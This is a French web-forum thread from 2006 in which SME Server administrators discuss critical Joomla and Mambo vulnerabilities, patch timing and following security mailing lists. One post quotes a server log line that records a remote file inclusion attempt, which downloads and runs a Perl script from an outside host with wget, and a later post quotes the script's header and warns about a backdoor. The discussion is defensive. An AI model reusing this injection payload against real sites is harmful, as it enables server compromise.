n'empeche j'en ai beaucoup
apparement sur joomla.org
il y a plusieurs failles critiques sur la derniere version de joomla et mambo
on attend le patche avec impatience
Faille sur SME 7 RC3 ?
Modérateur: modos Ixus
22 messages
• Page 2 sur 2 • 1, 2
par ericcfs2 » 23 Juin 2006 21:54
ok pas grave
n'empeche j'en ai beaucoup
apparement sur joomla.org
il y a plusieurs failles critiques sur la derniere version de joomla et mambo
on attend le patche avec impatience
n'empeche j'en ai beaucoup
apparement sur joomla.org
il y a plusieurs failles critiques sur la derniere version de joomla et mambo
on attend le patche avec impatience
de la poésie
http://www.poesie-citation.fr
http://www.poesie-citation.fr
-
ericcfs2 - Premier-Maître
- Messages: 56
- Inscrit le: 08 Nov 2003 01:00
- Localisation: 91
par sibsib » 24 Juin 2006 21:23
Oups,
alors çà peut devenir grave... Si tu utilises joomla sur ton serveur alors qu'une faille a été trouvée, et qu'un bot s'en rend compte...
Fais bien gaffe !
A+,
Pascal
alors çà peut devenir grave... Si tu utilises joomla sur ton serveur alors qu'une faille a été trouvée, et qu'un bot s'en rend compte...
Fais bien gaffe !
A+,
Pascal
Sibsib, admin heureux d'un petit SME !!!
- SME 8.0 beta 6 dans une VM :-)
- ESXI 4.1 sur hardware noname
Ma petite page sur SME
- SME 8.0 beta 6 dans une VM :-)
- ESXI 4.1 sur hardware noname
Ma petite page sur SME
-
sibsib - Amiral
- Messages: 2368
- Inscrit le: 11 Mai 2002 00:00
- Localisation: France - région parisienne
par ericcfs2 » 24 Juin 2006 21:54
oui ma reponse n'est pas trop approprié
oui cela peut etre grave
mais ma version de joomla est superieur a celle qui a la faille critique
http://forum.joomla.org/index.php/topic,54006.0.html
du moins pour les tentatives d'acces a mon serveur utilisant l'injection de parametre
enfin je surveille cela depres
par contre les sites en Joomla 1.0.3 doivent etre upgradé
oui cela peut etre grave
mais ma version de joomla est superieur a celle qui a la faille critique
http://forum.joomla.org/index.php/topic,54006.0.html
du moins pour les tentatives d'acces a mon serveur utilisant l'injection de parametre
xxx.xxx.xxx.xxx - - [01/Apr/2006:12:00:00 0000] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://medenin.me.funpic.de/cmd.txt?&cmd=cd%20/tmp;wget%20http://medenin.me.funpic.de/google.txt;perl%20google.txt;rm%20google.txt? HTTP/1.0" 200 167 "-" "Mozilla/5.0"
enfin je surveille cela depres
par contre les sites en Joomla 1.0.3 doivent etre upgradé
de la poésie
http://www.poesie-citation.fr
http://www.poesie-citation.fr
-
ericcfs2 - Premier-Maître
- Messages: 56
- Inscrit le: 08 Nov 2003 01:00
- Localisation: 91
par Grand-Pa » 24 Juin 2006 21:58
Un bon conseil, s'ils ont une ML security et/ou announce, abonne-toi pour suivre les éventuelles failles.
Je me suis déjà fait pirater mon serveur à cause d'une faille dans une application PHP bien connue et si j'avais suivi ce conseil, j'aurais pu anticiper et m'éviter des heures perdues à découvrir le fautif et à remettre mon système en état.
Je me suis déjà fait pirater mon serveur à cause d'une faille dans une application PHP bien connue et si j'avais suivi ce conseil, j'aurais pu anticiper et m'éviter des heures perdues à découvrir le fautif et à remettre mon système en état.
Et hop, finis les galons !
-
Grand-Pa - Vice-Amiral
- Messages: 728
- Inscrit le: 08 Avr 2002 00:00
- Localisation: Gap, France
par ericcfs2 » 24 Juin 2006 22:46
Merci Grand Pa
je suis abonné
j'attends la release 1.0.10
avec beaucoup d'impatience
il n'y a pas eu de modif depuis 3, 4 jours
et j'ai une sauvegarde bien au chaud
au cas ou
je suis abonné
j'attends la release 1.0.10
avec beaucoup d'impatience
il n'y a pas eu de modif depuis 3, 4 jours
et j'ai une sauvegarde bien au chaud
au cas ou
de la poésie
http://www.poesie-citation.fr
http://www.poesie-citation.fr
-
ericcfs2 - Premier-Maître
- Messages: 56
- Inscrit le: 08 Nov 2003 01:00
- Localisation: 91
Attention aux back door
par immobilia » 04 Juil 2006 14:16
D'apres tes logs, l'utilisateur a téléchargé ce script : http://dooku.anonimoserver.com/~web/energie.txt
#!/usr/bin/perl
#W0rm3d by shAdY @ wolrd-wide
#w0rm1ng the planet b1tchz
#gr33tz #COtS @ EFnet
#updated 25 February 2006 so it`s 0day kid0z
....
Et il est possible qu'il installe une back door, lui proposant l'accès (complet ou de l'utilisateur web/apache) à ta machine....
Bref a surveiller, je vais faire un petit tour des scripts de hacs, et en faire un bilan sur le forum http://www.placeoweb.com/joomla/index.p ... oomlaboard ou bien sur un nouveau DotClear.
#!/usr/bin/perl
#W0rm3d by shAdY @ wolrd-wide
#w0rm1ng the planet b1tchz
#gr33tz #COtS @ EFnet
#updated 25 February 2006 so it`s 0day kid0z
....
Et il est possible qu'il installe une back door, lui proposant l'accès (complet ou de l'utilisateur web/apache) à ta machine....
Bref a surveiller, je vais faire un petit tour des scripts de hacs, et en faire un bilan sur le forum http://www.placeoweb.com/joomla/index.p ... oomlaboard ou bien sur un nouveau DotClear.
- immobilia
- Matelot
- Messages: 1
- Inscrit le: 04 Juil 2006 14:10
22 messages
• Page 2 sur 2 • 1, 2
Retour vers E-Smith / SME Server
Qui est en ligne ?
Utilisateur(s) parcourant actuellement ce forum : Aucun utilisateur inscrit et 1 invité